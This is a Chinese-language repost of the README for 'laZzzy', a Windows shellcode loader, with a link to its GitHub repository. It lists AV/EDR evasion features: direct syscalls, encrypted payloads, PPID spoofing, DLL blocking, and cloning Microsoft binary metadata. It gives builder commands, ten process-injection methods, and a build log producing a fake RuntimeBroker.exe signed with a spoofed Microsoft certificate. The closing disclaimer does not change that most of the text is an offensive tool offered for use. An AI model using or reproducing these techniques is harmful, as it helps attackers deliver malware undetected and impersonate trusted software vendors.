laZzzy - shellcode 加载器
2022-12-28 10:3:4 Author: 黑白之道(查看原文) 阅读量:18 收藏

特征

  • 直接系统调用和本机 ( Nt*) 函数(不是所有函数,但大多数)

  • 导入地址表 (IAT) 规避

  • 加密有效负载(XOR 和 AES)

    • 随机生成的密钥

    • \x90使用 NOPS ( )自动填充有效负载(如有必要)

    • 有效负载的逐字节内存解密

  • XOR 加密字符串

  • PPID欺骗

  • 阻止非 Microsoft 签名的 DLL

  • (可选)克隆PE图标和属性

  • (可选)使用欺骗性证书进行代码签名

带有 Visual Studio 和以下组件的 Windows 机器,可以从Visual Studio Installer>Individual Components安装:

  • C++ Clang Compiler for WindowsandC++ Clang-cl for build tools

ClickOnce Publishing

(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -h
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀
usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]
options: -h, --help show this help message and exit -s path to raw shellcode -p password -m shellcode execution method (e.g. 1) -tp process to inject (e.g. svchost.exe) -sp process to spawn (e.g. C:\\Windows\\System32\\RuntimeBroker.exe) -pp parent process to spoof (e.g. explorer.exe) -b binary to spoof metadata (e.g. C:\\Windows\\System32\\RuntimeBroker.exe) -d domain to spoof (e.g. www.microsoft.com)
shellcode execution method: 1 Early-bird APC Queue (requires sacrificial proces) 2 Thread Hijacking (requires sacrificial proces) 3 KernelCallbackTable (requires sacrificial process that has GUI) 4 Section View Mapping 5 Thread Suspension 6 LineDDA Callback 7 EnumSystemGeoID Callback 8 FLS Callback 9 SetTimer 10 Clipboard

例子:

执行builder.py并提供必要的数据

(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -s .\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\Windows\\System32\\notepad.exe -d www.microsoft.com -b C:\\Windows\\System32\\mmc.exe
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀
[+] XOR-encrypting payload with [*] Key: d3b666606468293dfa21ce2ff25e86f6
[+] AES-encrypting payload with [*] IV: f96312f17a1a9919c74b633c5f861fe5 [*] Key: 6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec
[+] Modifying template using [*] Technique: Early-bird APC Queue [*] Process to inject: None [*] Process to spawn: C:\\Windows\\System32\\RuntimeBroker.exe [*] Parent process to spoof: svchost.exe
[+] Spoofing metadata [*] Binary: C:\\Windows\\System32\\RuntimeBroker.exe [*] CompanyName: Microsoft Corporation [*] FileDescription: Runtime Broker [*] FileVersion: 10.0.22621.608 (WinBuild.160101.0800) [*] InternalName: RuntimeBroker.exe [*] LegalCopyright: © Microsoft Corporation. All rights reserved. [*] OriginalFilename: RuntimeBroker.exe [*] ProductName: Microsoft® Windows® Operating System [*] ProductVersion: 10.0.22621.608
[+] Compiling project [*] Compiled executable: C:\MalDev\laZzzy\loader\x64\Release\laZzzy.exe
[+] Signing binary with spoofed cert [*] Domain: www.microsoft.com [*] Version: 2 [*] Serial: 33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6 [*] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com [*] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06 [*] Not Before: October 04 2022 [*] Not After: September 29 2023 [*] PFX file: C:\MalDev\laZzzy\output\www.microsoft.com.pfx
[+] All done! [*] Output file: C:\MalDev\laZzzy\output\RuntimeBroker.exe

Shellcode 执行技术

  1. Early-bird APC Queue (需要牺牲过程)

  2. 线程劫持(需要牺牲进程)

  3. KernelCallbackTable (需要具有 GUI 的牺牲进程)

  4. 截面视图映射

  5. 线程暂停

  6. LineDDA回调

  7. EnumSystemGeoID 回调

  8. 光纤本地存储 (FLS) 回调

  9. 设置定时器

  10. 剪贴板

https://github.com/capt-meelo/laZzzy

文章来源:Khan安全攻防实验室

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650559921&idx=5&sn=d7aee9c1ce472489dd85aee45feb6358&chksm=83bd3055b4cab9438e725e795f05ceac8a629d49791e5691f6320d1e9ea3ffbc61ed5b9b8053#rd
如有侵权请联系:admin#unsafe.sh